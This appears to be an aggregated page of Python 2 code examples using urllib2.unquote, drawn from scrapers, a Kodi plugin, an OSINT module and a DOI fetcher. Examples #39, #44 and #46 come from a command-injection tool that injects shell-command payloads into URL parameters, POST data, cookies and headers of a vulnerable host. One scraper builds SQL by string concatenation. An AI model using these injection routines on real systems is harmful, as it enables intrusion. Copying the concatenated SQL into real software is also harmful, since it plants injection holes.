    colon1 = colon1.encode('utf8')
    pass_ = urllib2.quote(pass_.encode('utf8'))
    at = at.encode('utf8')
    host = host.encode('idna')
    colon2 = colon2.encode('utf8')
    port = port.encode('utf8')
    path = '/'.join(  # could be encoded slashes!
        urllib2.quote(urllib2.unquote(pce).encode('utf8'),'')
        for pce in parsed.path.split('/')
    )
    query = urllib2.quote(urllib2.unquote(parsed.query).encode('utf8'),'=&?/')
    fragment = urllib2.quote(urllib2.unquote(parsed.fragment).encode('utf8'))

    # put it back together
    netloc = ''.join((user,colon1,pass_,at,host,colon2,port))
    return urlparse.urlunsplit((scheme,netloc,path,query,fragment))
Example #31
 def decode_url(self):
     #print url
     #print repr(urllib2.unquote(url))
     return urllib2.unquote(self.image_url)
Example #32
    def parse_page(self, response):
        lists = response.selector.xpath(
            '//table[@id="datatable-checkbox"]/tbody/tr[position()>1]')
        prototype = response.meta['prototype']

        for i in lists:
            listsdownbutton = i.xpath(
                './td[4]/a/@href').extract()  # a file link, not a directory

            if not listsdownbutton:  # it is a directory
                dirurl = i.xpath('./td[1]/a[1]/@href').extract()
                absurl = urlparse.urljoin(response.url, dirurl[0])
                request = scrapy.Request(absurl, callback=self.parse_page)
                request.meta["prototype"] = response.meta["prototype"]
                yield request
            else:
                #get information
                absurlfile = urlparse.urljoin(response.url, listsdownbutton[0])
                filename = absurlfile.rsplit('/', 1)[-1]
                filename = urllib2.unquote(
                    filename)  # decode percent-escapes in the filename
                filetype = filename.split('.')[-1]
                publishtime = i.xpath('./td[3]/text()').extract()[0]
                hikvisionSpider.allsuffix.add(filetype)

                if filetype in hikvisionSpider.suffix:
                    # print "zhua qu"
                    item = MI.FirmcrawlerItem(prototype)
                    item["firmwareName"] = filename
                    item["crawlerTime"] = time.strftime("%Y-%m-%d %H:%M:%S")
                    item["url"] = absurlfile
                    item["publishTime"] = publishtime
                    item["description"] = absurlfile.split(
                        '/')[5] + "/" + absurlfile.split('/')[6]
                    item["productVersion"] = ""
                    item["productModel"] = ""
                    item["productClass"] = ""  # TODO: not filled in yet

                    #version
                    regVersion = re.compile(
                        r'[V,v]*[0-9]\.[0-9][0-9]*\.*[0-9]*[0-9]*')
                    regVersions = regVersion.search(filename)
                    if regVersions:  # if the firmware name has a version number, a model number is always present
                        item["productVersion"] = regVersions.group()

                        #-----productModel-------
                        Modeldiv1 = filename.split("_")
                        Modeldiv1len = len(Modeldiv1)
                        if filename.split(
                                " "
                        )[0] == "Baseline":  # firmware names starting with "Baseline", e.g. Baseline IPD_Raptor_En_5.2.8_150124.zip
                            # four Baseline cases:
                            if len(
                                    filename.split(" ")
                            ) >= 4:  # e.g. Baseline%20Firmware_IPC_R4%20series_En_V5.2.0%20140721.zip
                                item["productModel"] = filename.split(" ",
                                                                      2)[1]
                            elif len(
                                    filename.split(" ")
                            ) == 2:  # e.g. Baseline%20IPD_Raptor_En_5.3.0_150410.zip and Baseline_IPD_En_V3.2.0%20131223%28Released%29.zip
                                if regVersion.search(filename.split(" ")[1]):
                                    Modeldiv021 = filename.split(" ")[1].split(
                                        "_", 2)
                                    arr = []
                                    arr.append(Modeldiv021[0])
                                    arr.append(Modeldiv021[1])
                                    item["productModel"] = "_".join(arr)
                                else:
                                    Modeldiv022 = filename.split(" ")[1].split(
                                        "_", 2)
                                    arr = []
                                    arr.append(Modeldiv022[0])
                                    arr.append(Modeldiv022[1])
                                    item["productModel"] = "_".join(arr)
                            elif len(
                                    filename.split(" ")
                            ) == 3:  # e.g. Baseline%20IPC_R1_En_V5.2.0%20140721.zip

                                Modeldiv03 = filename.split(" ", 2)[1].split(
                                    "_", 2)
                                arr = []
                                arr.append(Modeldiv03[0])
                                arr.append(Modeldiv03[1])
                                item["productModel"] = "_".join(arr)

                        elif re.compile(r"[D,d]igicap").search(
                                filename):  # digicap_STD_V3.1.2_20140512.zip
                            item["productModel"] = "Digicap"
                        elif Modeldiv1len > 1 and regVersion.search(
                                Modeldiv1[1]
                        ):  # DS-6400HDI-T_V1.5.0 build 120601.rar.zip
                            item["productModel"] = Modeldiv1[0]

                        else:  # common case: take the first two parts, e.g. NVR_71_4_8_SN_BL_EN_STD_V3.0.18_151231.zip
                            # Modeldiv1 = filename.split("_") is already defined before this conditional
                            # mainly handles models with several numeric parts,
                            # e.g. DS-71_72_73_81_80_9000HQHI(HGHI)-SH_ML_STD_V3.1.3_150212.zip
                            arr1 = []
                            count = 1  # number of numeric parts matched so far
                            flags = False
                            for element in Modeldiv1:

                                if count < 3:
                                    if re.compile(r"\(").search(
                                            element
                                    ):  # handles names like NVR_%2871_16_SN%29BL_ML_Eurpon_South_STD_V3.0.17_150804.zip, i.e. NVR_(71
                                        flags = True
                                    if re.compile(r"\)").search(
                                            element
                                    ):  # closing parenthesis of the same NVR_%28...%29 pattern
                                        flags = False
                                    arr1.append(element)
                                    count += 1
                                else:
                                    if regVersion.search(element):
                                        break
                                    if re.compile(r"^[0-9]\w*").search(
                                            element) or flags == True:
                                        arr1.append(element)
                                        count += 1
                                        if re.compile(r"\)").search(element):
                                            flags = False
                                    else:
                                        break

                            item["productModel"] = "_".join(arr1)
                        #-----productModel-------
                    else:
                        item["productVersion"] = ""
                        item["productModel"] = ""
                    print "firmwareName:", item["firmwareName"]
                    yield item
        #print "all suffix:",hikvisionSpider.allsuffix
        return
Example #33
def fetchMiaopaiData():
  lastid = None;
  dr = re.compile(r'<[^>]+>',re.S)
  uname = '/app/yxtk/script/useragent.txt'
  f1 = open("/app/yxtk/script/data/leikejitechnews.sql",'w',buffering=-1)
  with open(uname) as f:
        useragents = f.readlines()  
  userAgent = random.choice(useragents) 
  url = ''
  headers = {
             'Accept':'*/*',
             'Accept-Encoding':'gzip, deflate, sdch',
             'Accept-Language':'zh-CN,zh;q=0.8',
             'Cache-Control':'max-age=0',
             'Connection':'keep-alive',
             'Host':'www.leikeji.com',
             'Referer':'http://www.leikeji.com/columns/articles/%E8%B5%84%E8%AE%AF',
             'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'
            }
  while True:
      for k in range(0,2):
          time.sleep(1)
          pageNo = 0;
          for j in range(1,2):
             if k==0:
                 url = r'http://www.leikeji.com/columns/getArticleList?ifHome=1&status=1&channels=1&pageIndex=1&pageSize=10&orderBy=postDate&orderType=desc&colName=%E8%B5%84%E8%AE%AF'
             if k==1:
                 url = r'http://www.leikeji.com/columns/getArticleList?ifHome=1&status=1&channels=1&pageIndex=1&pageSize=10&orderBy=postDate&orderType=desc&colName=%E5%98%BF%E7%A7%91%E6%8A%80'
             print url
             try:
                 encoding_support = ContentEncodingProcessor
                 data = None;
                 opener = urllib2.build_opener(encoding_support)
                 opener.addheaders = [('User-agent', userAgent[:-2]),('Accept-Encoding',"gzip, deflate")]
                 urllib2.install_opener(opener)
                 req = urllib2.Request(url.strip(),data,headers)
                 con = urllib2.urlopen(req)
                 result = json.load(con);
                 result = json.dumps(result, sort_keys=True, indent=2)
                 result = json.loads(result);
                 result = result['data']
                 if len(result) == 0:
                    break; 
                 pageNo = len(result);
                 for i in range(0,pageNo):
                   life_id  = str(result[i]['onlyUrl']).encode('utf-8');
                   if result[i].has_key('title'):
                       life_title = "\" "+result[i]['title'].replace('\"','\'').encode('utf-8')+" \""
                       life_title = dr.sub('',life_title)
                       life_title = life_title.replace("\n",'')
                       life_title = life_title.replace(",",',')
                   else:
                       life_title = "";
                   life_date = result[i]['postDate']
                   if life_date.find('小时') > -1:
                        m = re.findall(r'(\w*[0-9]+)\w*',str(life_date))
                        life_date = datetime.datetime.today() - datetime.timedelta(hours=float(m[0]))
                        life_date = str(life_date.strftime("%Y-%m-%d %H:%M:%S"))
                   elif life_date.find('刚刚') > -1:
                        life_date = datetime.datetime.today()
                        life_date = str(life_date.strftime("%Y-%m-%d %H:%M:%S"))
                   if result[i].has_key('picUrl'):
                       life_pic = result[i]['picUrl'].encode('utf-8');
                   else:
                       life_pic = ""
                       life_id = '0000'
                   life_url = 'http://www.leikeji.com/article/'+life_id
                   imageUrl=qiniuUpdate(life_pic.strip())

                   req = urllib2.Request(life_url)
                   res = urllib2.urlopen(req)
                   html1 = unicode(res.read(),'utf-8')
                   res.close()
                   doc1 = pq(html1)
                   con = doc1('div.article-content')
                   con('img').removeAttr("style")
                   con('img').removeAttr("width")
                   con('img').removeAttr("height")
                   con('img').attr("style","width:100%")
                   p = con('div.article-content').html()
                   if p is None or p =='':
                     continue
                   p = re.sub(r'&#13;','',p)
                   p = re.sub(r'<style.*>([\S\s\t]*?)</style>','',p)
                   p = re.sub(r'<script.*>([\S\s\t]*?)</script>','',p)
                   p = re.sub(r'<p[^>]*>','<p>',p)
                   p = re.sub(r'<(?!img|br|p|/p).*?>','',p)
                   p = re.sub(r'\r','',p)
                   p = re.sub(r'\n','',p)
                   p = re.sub(r'\s','',p)
                   p = re.sub(r'src=',' src=',p)
                   life_id = str(life_id)+'00'

                   #newqiniu = pq(p)
                   #imgs = newqiniu('img')
                   #for image in imgs.items():
                    #imgurl = image('img').attr('src')
                    #newimgurl = qiniuUpdate(imgurl.strip())
                    #p = p.replace(str(imgurl),str(newimgurl))
                   sql = "INSERT INTO 3rd_technology(id,creator,modifier,create_time,modify_time,is_deleted,technology_id,title,third_date,img_url,sort,user_id,thumbnail_url,source,tag,content,push_flag,recommend_flag,view_status) VALUES(NULL,'sys','sys',now(),now(),'n','"+life_id+ "'," +life_title.strip() + ",'" + str(life_date) +"','"+life_pic.strip()+"','0','','"+imageUrl+"','雷科技','','"+p.strip()+"',0,NULL,0);"+'\n'
                   print sql
                   f1.writelines(sql)
                   file_name = urllib2.unquote(life_pic.strip()).decode('utf8').split('/')[-1]
                   os.remove('/app/yxtk/script/'+file_name)
             except Exception as e:
               print e
      break
  f1.close()
Example #34
def loadVideos(url,name):
        #try:
           GA("LoadVideos",name)
           link=GetContent(url)
           newlink = ''.join(link.encode("utf-8").splitlines()).replace('\t','')
           vidurl=""
           match=re.compile("'file':\s*'(.+?)',").findall(newlink)
           if(len(match) == 0):
                   match=re.compile('<div class="video_main">\s*<iframe [^>]*src=["\']?([^>^"^\']+)["\']?[^>]*>').findall(newlink)
                   if(len(match)==0):
                           match=re.compile('<iframe [^>]*src=["\']?([^>^"^\']+)["\']?[^>]*>').findall(newlink)
                           if(len(match)==0):
                                   match=re.compile("<param name='flashvars' value='file=(.+?)&").findall(newlink)
                                   if(len(match)==0):
                                           match=re.compile('file:\s*"(.+?)",').findall(newlink)
           newlink=match[0]
           print newlink
           #xbmc.executebuiltin("XBMC.Notification(Please Wait!,Loading selected video)")
           if (newlink.find("dailymotion") > -1):
                match=re.compile('www.dailymotion.com/embed/video/(.+?)\?').findall(newlink+"?")
                if(len(match) == 0):
                        match=re.compile('www.dailymotion.com/video/(.+?)&dk;').findall(newlink+"&dk;")
                if(len(match) == 0):
                        match=re.compile('www.dailymotion.com/swf/(.+?)\?').findall(newlink)
                if(len(match) == 0):
                	match=re.compile('www.dailymotion.com/embed/video/(.+?)\?').findall(newlink.replace("$","?"))
                vidlink=getDailyMotionUrl(match[0])
                playVideo('dailymontion',vidlink)
           elif (newlink.find("docs.google.com") > -1 or newlink.find("drive.google.com") > -1):  
                docid=re.compile('/d/(.+?)/preview').findall(newlink)[0]
                vidcontent = GetContent("https://docs.google.com/get_video_info?docid="+docid) 
                html = urllib2.unquote(vidcontent)
                try:
                    html=html.encode("utf-8","ignore")
                except: pass
                stream_map = re.compile('fmt_stream_map=(.+?)&fmt_list').findall(html)
                if(len(stream_map) > 0):
                    formatArray = stream_map[0].replace("\/", "/").split(',')
                    for formatContent in formatArray:
                        formatContentInfo = formatContent.split('|')
                        qual = formatContentInfo[0]
                        vidlink = (formatContentInfo[1]).decode('unicode-escape')

                else:
                    cj = cookielib.LWPCookieJar()
                    newlink1="https://docs.google.com/uc?export=download&id="+docid
                    (cj,vidcontent) = GetContent2(newlink1,newlink, cj)
                    soup = BeautifulSoup(vidcontent)
                    downloadlink=soup.findAll('a', {"id" : "uc-download-link"})[0]
                    newlink2 ="https://docs.google.com" + downloadlink["href"]
                    vidlink=GetDirVideoUrl(newlink2,cj)
                playVideo('google',vidlink)
           elif (newlink.find("vimeo") > -1):
                #
                print "newlink|" + newlink
                idmatch =re.compile("//player.vimeo.com/video/(.+?)\?").findall(newlink+"?")
                print idmatch
                vidurl=getVimeoUrl(idmatch[0],"http://"+url.split('/')[2])
                playVideo('khmeravenue',vidurl)
           elif (newlink.find("sendvid.com") > -1):
                sid = urllib2.unquote(newlink).replace("//", "http://")
                link=GetContent(sid)
                match = re.compile('<source src="(.+?)"').findall(link)
                vidurl = urllib2.unquote(match[0]).replace("//", "http://")
                playVideo('sendvid',vidurl)
           elif (newlink.find("vid.me") > -1):
                link=GetContent(newlink)
                link = ''.join(link.splitlines()).replace('\'','"')
                match=re.compile('<meta property="og:video:url" [^>]*content=["\']?([^>^"^\']+)["\']?[^>]*>').findall(link)
                for vbam in match:
                     if(vbam.find(newlink) == -1):
                          vidurl=urllib2.unquote(vbam).replace("&amp;","&") 
                playVideo('khmeravenue',vidurl)
           elif (newlink.find("videobam") > -1):
                link=GetContent(newlink)
                link = ''.join(link.splitlines()).replace('\'','"')
                match=re.compile('"url"\s*:\s*"(.+?)","').findall(link)
                for vbam in match:
                     if(vbam.find("mp4") > -1):
                          vidurl=vbam.replace("\\","")
                playVideo('khmeravenue',vidurl)
           elif (newlink.find("4shared") > -1):
                d = xbmcgui.Dialog()
                d.ok('Not Implemented','Sorry 4Shared links',' not implemented yet')
           else:
                if (newlink.find("linksend.net") > -1):
                     d = xbmcgui.Dialog()
                     d.ok('Not Implemented','Sorry videos on linksend.net does not work','Site seem to not exist')
                newlink1 = urllib2.unquote(newlink).decode("utf8")+'&dk;'
                print 'NEW url = '+ newlink1
                match=re.compile('(youtu\.be\/|youtube-nocookie\.com\/|youtube\.com\/(watch\?(.*&)?v=|(embed|v|user)\/))([^\?&"\'>]+)').findall(newlink1)
                if(len(match) == 0):
                    match=re.compile('http://www.youtube.com/watch\?v=(.+?)&dk;').findall(newlink1)
                if(len(match) > 0):
                    lastmatch = match[0][len(match[0])-1].replace('v/','')
                    #d = xbmcgui.Dialog()
                    #d.ok('mode 2',str(lastmatch),'launching yout')
                    playVideo('youtube',lastmatch)
                else:
                    playVideo('moviekhmer',urllib2.unquote(newlink).decode("utf8"))
Example #35
DOI_REGEXP_FLAGS = re.IGNORECASE | re.VERBOSE

# error messages
ERR_STR_PREFIX = 'status\terr\t'
ERR_STR_FETCH = 'Unable to fetch the bibliographic data: '
ERR_STR_TRY_AGAIN = 'The server may be down.  Please try later.'
ERR_STR_NO_DOI = 'No document object identifier found in the URL: '
ERR_STR_REPORT = 'Please report the error to [email protected].'

# read url from std input
url = sys.stdin.readline()
# get rid of the newline at the end
url = url.strip()

# 'unparse' url to remove %HH escapes which confuse the DOI parser below
url = urllib2.unquote(url)

# parse the DOI from the url and exit gracefully if not found
doi_match = re.search(DOI_REGEXP, url, DOI_REGEXP_FLAGS)
if not doi_match:
    print ERR_STR_PREFIX + ERR_STR_NO_DOI + url + '.  ' + ERR_STR_REPORT
    sys.exit(1)

doi_prefix = doi_match.group(1)
doi_suffix = doi_match.group(2)
url_doi = doi_prefix + DOI_URL_SEP + doi_suffix
doi = doi_prefix + DOI_SEP + doi_suffix

# fetch the BibTeX entry for the DOI and exit gracefully in case of trouble
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
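
DOI_REGEXP, DOI_URL_SEP and DOI_SEP are defined earlier in the script and are not shown in the fragment above. Purely as an illustration (an assumption, not the original pattern), a DOI regex with the two groups the fragment expects might look like this:

import re, urllib2

# Illustrative only: group 1 is the '10.xxxx' prefix, group 2 the suffix.
DOI_REGEXP = r'(10\.[0-9]{4,})(?:/|%2F)(\S+)'

m = re.search(DOI_REGEXP,
              urllib2.unquote('http://dx.doi.org/10.1000%2Fexample.doi'),  # made-up URL
              re.IGNORECASE | re.VERBOSE)
print m.group(1), m.group(2)    # -> 10.1000 example.doi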
Example #36
        if numCores >= str(nCores) or numCores == '0':
            numCores = str(nCores - 1)
    except:
        pass

    #retrieve the current working directory
    #TODO: Remove the cookie block once it's confirmed safe to do so
    curDir = ""
    if 'HTTP_COOKIE' in os.environ:
        try:
            cookiestr = os.environ.get('HTTP_COOKIE')
            c = Cookie.SimpleCookie()
            c.load(cookiestr)

            curDir = urllib2.unquote(c['OGCWOrkingDir'].value)
        except:
            pass  #fall out quietly for now

    #get values passed from Angular's $sessionStorage
    #supersedes cookies
    curDir = query.getvalue('OGCWOrkingDir')

    #TODO: os.path.join() this
    #if WIN_PLATFORM_NONFREE:
    #    curDir = curDir.replace('\\', '\\\\')

    #default input file created by script 1 in the previous step (vcfload.py)
    inpfile = 'pre_processed_inp_file.vcf.gz'

    #suppress output, if any, and run API call
Пример #37
0
        except:
            continue
        sub_vers = html.fromstring(subroot).xpath(
            repo["sub_discovery_pattern"],
            namespaces={"regex": "http://exslt.org/regular-expressions"})
        for sub_ver in sub_vers:
            sub_ver = sub_ver.lstrip('/')
            # The try - except block is used because 404 errors and similar
            # might happen (and actually happen because not all repos have
            # packages we need)
            try:
                source = repo["root"] + sub_ver
                page = urlopen(source, timeout=URL_TIMEOUT).read()
                rpms = html.fromstring(page).xpath(
                    repo["page_pattern"],
                    namespaces={
                        "regex": "http://exslt.org/regular-expressions"
                    })

                source = source.replace("index.html", "")
                for rpm in rpms:
                    urls.add(source + str(unquote(rpm)))
            except:
                continue

#
# Print URLs to stdout
#
for url in urls:
    print(url)
Пример #38
0
    def handleEvent(self, event):
        eventName = event.eventType
        srcModuleName = event.module
        eventData = event.data
        self.currentEventSrc = event

        if self.errorState:
            return None

        self.sf.debug("Received event, " + eventName + ", from " +
                      srcModuleName)

        if self.opts['google_api_key'] == "" and self.opts[
                'bing_api_key'] == "":
            self.sf.error(
                "You enabled sfp_socialprofiles but did not set a Google or Bing API key!",
                False)
            self.errorState = True
            return None

        # Don't look up stuff twice
        if eventData in self.results:
            self.sf.debug("Skipping " + eventData + " as already mapped.")
            return None
        else:
            self.results[eventData] = True

        if self.keywords is None:
            self.keywords = self.sf.domainKeywords(self.getTarget().getNames(),
                                                   self.opts["_internettlds"])
            if len(self.keywords) == 0:
                self.keywords = None

        for site in sites:
            s = unicode(sites[site][0]).format(name=eventData)
            searchStr = s.replace(" ", "%20")
            res = None

            if self.opts["method"].lower() == "yahoo":
                self.sf.error(
                    "Yahoo is no longer supported. Please try 'bing' or 'google'.",
                    False,
                )
                return None

            if self.opts["method"].lower() == "google":
                res = self.sf.googleIterate(
                    searchString=searchStr,
                    opts={
                        "timeout": self.opts["_fetchtimeout"],
                        "useragent": self.opts["_useragent"],
                        "api_key": self.opts["google_api_key"],
                        "cse_id": self.opts["google_cse_id"],
                    },
                )
                self.__dataSource__ = "Google"

            if self.opts["method"].lower() == "bing":
                res = self.sf.bingIterate(
                    searchString=searchStr,
                    opts={
                        "timeout": self.opts["_fetchtimeout"],
                        "useragent": self.opts["_useragent"],
                        "count": self.opts["count"],
                        "api_key": self.opts["bing_api_key"],
                    },
                )
                self.__dataSource__ = "Bing"

            if res is None:
                self.sf.info("No data returned from " + self.opts["method"] +
                             ".")
                continue

            if self.checkForStop():
                return None

            # Submit the results for analysis
            evt = SpiderFootEvent("RAW_RIR_DATA", str(res), self.__name__,
                                  event)
            self.notifyListeners(evt)

            instances = list()
            for searchDom in sites[site][1]:
                # Search both the urls & the search engine web content
                search_string = " ".join(res["urls"] + [str(res)])

                matches = re.findall(searchDom, search_string,
                                     re.IGNORECASE | re.MULTILINE)

                if not matches:
                    continue

                for match in matches:
                    self.sf.debug("Match found: " + match)
                    if match in instances:
                        continue
                    else:
                        instances.append(match)

                    if self.checkForStop():
                        return None

                    # Fetch the profile page if we are checking
                    # for a firm relationship.
                    # Keywords might be empty if the target was an IP, subnet or name.
                    if self.opts["tighten"] and self.keywords:
                        match = urllib2.unquote(match)
                        self.sf.debug("Tightening results to look for " +
                                      str(self.keywords))
                        pres = self.sf.fetchUrl(
                            match,
                            timeout=self.opts["_fetchtimeout"],
                            useragent=self.opts["_useragent"],
                        )

                        if pres["content"] is None:
                            continue
                        else:
                            found = False
                            for kw in self.keywords:
                                if re.search(
                                        "[^a-zA-Z\-\_]" + kw + "[^a-zA-Z\-\_]",
                                        pres["content"],
                                        re.IGNORECASE,
                                ):
                                    found = True
                            if not found:
                                continue

                    self.sf.info("Social Media Profile found at " + site +
                                 ": " + match)
                    match = urllib2.unquote(match)
                    evt = SpiderFootEvent("SOCIAL_MEDIA", site + ": " + match,
                                          self.__name__, event)
                    self.notifyListeners(evt)
Пример #39
0
def injection(separator,maxlen,TAG,cmd,delay,http_request_method,url,vuln_parameter,OUTPUT_TEXTFILE,alter_shell):

  print "\n(*) Retrieving the length of execution output..."
  for j in range(1,int(maxlen)):
    
    # Execute shell commands on vulnerable host.
    if not alter_shell :
      payload = tfb_payloads.cmd_execution(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method)
    else:
      payload = tfb_payloads.cmd_execution_alter_shell(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method)

    # Check if defined "--verbose" option.
    if menu.options.verbose:
      sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
      
    start = 0
    end = 0
    start = time.time()
    
    # Check if the request method is GET (default).
    if http_request_method == "GET":
      payload = urllib.quote(payload)

      # Check whether the 'INJECT_HERE' tag is specified.
      url = parameters.do_GET_check(url)
      
      target = re.sub(settings.INJECT_TAG, payload, url)
      vuln_parameter = ''.join(vuln_parameter)
      
      #print target
      request = urllib2.Request(target)
  
      # Check if defined extra headers.
      headers.do_check(request)
		      
      # Check if defined any HTTP Proxy.
      if menu.options.proxy:
        try:
          proxy = urllib2.ProxyHandler({'http': menu.options.proxy})
          opener = urllib2.build_opener(proxy)
          urllib2.install_opener(opener)
          response = urllib2.urlopen(request)
          response.read()

        except urllib2.HTTPError, err:
          print "\n(x) Error : " + str(err)
          sys.exit(1)

      else:
        response = urllib2.urlopen(request)
        response.read()
	
    # Otherwise, the request method is POST.
    else:
      parameter = menu.options.data
      parameter = urllib2.unquote(parameter)

      # Check whether the 'INJECT_HERE' tag is specified.
      parameter = parameters.do_POST_check(parameter)
      
      data = re.sub(settings.INJECT_TAG, payload, parameter)
      request = urllib2.Request(url, data)
      
      # Check if defined extra headers.
      headers.do_check(request)

      # Check if defined any HTTP Proxy.
      if menu.options.proxy:
        try:
          proxy = urllib2.ProxyHandler({'http': menu.options.proxy})
          opener = urllib2.build_opener(proxy)
          urllib2.install_opener(opener)
          response = urllib2.urlopen(request)
          response.read()

        except urllib2.HTTPError, err:
          print "\n(x) Error : " + str(err)
          sys.exit(1)

      else:
Пример #40
0
 def _get_uri_path(self, uri):
     return urllib2.unquote(urlparse.urlparse(uri).path)
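
A standalone sketch of what the helper yields for a percent-encoded URI (the enclosing class is not shown, so the same expression is repeated inline):

import urllib2
import urlparse

uri = 'http://example.com/My%20Folder/report.txt?x=1'
print urllib2.unquote(urlparse.urlparse(uri).path)  # -> /My Folder/report.txt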
Пример #41
0
            return "The name '{}' is already in use.".format(d['cagename'])        
        d_cages={}
        for col in set(getAllColumns('cages')) & set(d.keys()):
            d_cages[col]=d[col]
        columns=', '.join(d_cages.keys())
        parameters = ', '.join(['%({0})s'.format(k) for k in d_cages.keys()])
        query = 'INSERT INTO cages ({0}) VALUES ({1})'.format(columns, parameters)
        db.execute(query,d)
        m_id=db.execute("SELECT id FROM cages where name=%s",(d['cagename'],))[0][0]
        self.d={"id":m_id, 'cagename':d['cagename']}
        
        if d['caretaker'] is not None:
            db.execute("INSERT INTO care_taker SET cage_id=%s, lab_member_id=(SELECT id FROM lab_members WHERE name=%s)",(self.d['id'],d['caretaker']))
        return "Successfully added cage"
        
if __name__=='__main__':
    data='name=testmouse&tag=pop&strain=C57BL/6&sex=female&life_status=alive&breeding_status=unknown&DOB=2013-08-26&DOD=2013-08-20&cause_of_death=flogging&notes=&mother=lalala&father=kite&reserve_lab_member=Ethan&reserve_date=2013-08-07&reserve_description=an experiment&genotyped=True&gene1=i-tdTomato&zygosity1= -&gene2=&zygosity2=&cagename=wt1&startDate=2013-08-26&oldcagename1=&startDate1=&endDate1='
    data=urllib2.unquote(data.replace('+',' '))
    data2=[[b for b in c.split('=')] for c in data.split('&')] #list of lists
    m=Mouse()
    d={}
    for i in data2:
        if i[1]=='':
            d[i[0]]=None
        elif i[1]=='True':
            d[i[0]]=1
        elif i[1]=='False':
            d[i[0]]=0
        else:
            d[i[0]]=i[1] #now in dictionary
    m.addToDB(d)
Пример #42
0
    def get(self, request, *args, **kwargs):
        results = []
        # allow choice of release, default to 2012 1-year
        release = self.request.GET.get('release', 'ACS 2012 1-Year')

        # comparison query builder throws a search term here,
        # so force it to look at just one release
        q = self.request.GET.get('q', None)
        topics = self.request.GET.get('topics', None)
        tables = Table.objects.filter(release=release)
        columns = Column.objects.filter(table__release=release)

        if q:
            q = q.strip()
            if q == '*':
                columns = None
            else:
                tables = tables.filter(
                    Q(table_name__icontains=q) | Q(table_id__icontains=q))
                columns = columns.filter(
                    Q(column_name__icontains=q) | Q(column_id=q)
                    | Q(table__table_id=q))
        else:
            # only fetch tables on unfiltered query
            columns = None

        if topics:
            topic_list = unquote(topics).split(',')
            for topic in topic_list:
                tables = tables.filter(topics__contains=topic)
                if columns:
                    columns = columns.filter(table__topics__contains=topic)

        # short-circuit if just requesting a count
        count = self.request.GET.get('count', None)
        if count == 'tables':
            return render_json_to_response({'count': tables.count()})

        tables = tables.extra(select={
            'length': 'Length(table_id)'
        }).extra(order_by=['length', 'table_id'])
        tables = tables.values('table_id', 'table_name', 'topics', 'length')
        tables_list = [
            self.format_result(table, 'table') for table in list(tables)
        ]
        results.extend(tables_list)

        if columns:
            columns = columns.values('parent_table_id', 'table__table_name',
                                     'table__topics', 'column_id',
                                     'column_name')
            columns_list = [
                self.format_result(column, 'column')
                for column in list(columns)
            ]
            results.extend(columns_list)

        table = self.request.GET.get('table', None)
        if table:
            tables = tables.filter(table_name__icontains=table).values()
            results['tables'] = list(tables)

        column = self.request.GET.get('column', None)
        if column:
            columns = columns.filter(column_name__icontains=column).values()
            columns = columns.only('table', 'parent_table_id', 'column_name',
                                   'column_id')
            results['columns'] = list(columns)

        return render_json_to_response(results)
Пример #43
0
def getResponseURL(opener, url, post_data=None, debug=False):
    return urllib2.unquote(_getResponse(opener, url, post_data, debug).url)
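
A hedged usage sketch; it assumes _getResponse (not shown) performs the request through the supplied opener and returns the response object, so the call below yields the final, unquoted URL after any redirects:

opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
print getResponseURL(opener, 'http://example.com/short%20link')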
Пример #44
0
        urllib2.install_opener(opener)
        response = urllib2.urlopen(request)
        response.read()

      except urllib2.HTTPError, err:
        print "\n(x) Error : " + str(err)
        sys.exit(1)

    else:
      response = urllib2.urlopen(request)
      response.read()
      
  # Otherwise, the request method is POST.
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)

    # Check whether the 'INJECT_HERE' tag is specified.
    parameter = parameters.do_POST_check(parameter)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter,url)
    
    # Define the POST data
    data = re.sub(settings.INJECT_TAG, payload, parameter)
    request = urllib2.Request(url, data)
    
    # Check if defined extra headers.
    headers.do_check(request)
    
    # Check if defined any HTTP Proxy.
Пример #45
0
                        "INSERT INTO ti(data,threat,threat_info) VALUES (?,?,?)",
                        (u, data[5], data[7]))

        if data[3] == 'rss':

            feeds = feedparser.parse(data[2])
            for feed in feeds.entries:

                if data[9] == 'manual':
                    re_domain = re.findall(data[10], feed.title_detail.value)
                    re_threat = re.findall(data[8], str(feed.summary_detail))

                    for d, thr in zip(re_domain, re_threat):
                        c.execute(
                            "INSERT INTO URL(url,threat,threat_info) VALUES (?,?,?)",
                            (urllib.unquote(d), data[5], thr))
                        c.execute(
                            "INSERT INTO ti(data,threat,threat_info) VALUES (?,?,?)",
                            (urllib.unquote(d), data[5], thr))

                if data[9] == 'link':

                    try:
                        re_domain = re.findall(data[10], feed.link)
                    except:
                        re_domain = re.findall(data[10], data[2])

                    for d in re_domain:
                        c.execute(
                            "INSERT INTO URL(url,threat,threat_info) VALUES (?,?,?)",
                            (urllib.unquote(d), data[5], feed.title))
Пример #46
0
def injection(separator, TAG, cmd, prefix, suffix, whitespace,
              http_request_method, url, vuln_parameter, alter_shell, filename):

    # Execute shell commands on vulnerable host.
    if alter_shell:
        payload = eb_payloads.cmd_execution_alter_shell(separator, TAG, cmd)
    else:
        payload = eb_payloads.cmd_execution(separator, TAG, cmd)

    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)
    # Fixation for specific payload.
    if ")%3B" + urllib.quote(")}") in payload:
        payload = payload.replace(")%3B" + urllib.quote(")}"),
                                  ")" + urllib.quote(")}"))

    # Whitespace fixation
    payload = re.sub(" ", whitespace, payload)

    if settings.TAMPER_SCRIPTS['base64encode']:
        from src.core.tamper import base64encode
        payload = base64encode.encode(payload)

    # Check if defined "--verbose" option.
    if settings.VERBOSITY_LEVEL >= 1:
        sys.stdout.write("\n" + settings.print_payload(payload))

    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
        response = cookie_injection_test(url, vuln_parameter, payload)

    # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
        response = user_agent_injection_test(url, vuln_parameter, payload)

    # Check if defined referer with "INJECT_HERE" tag
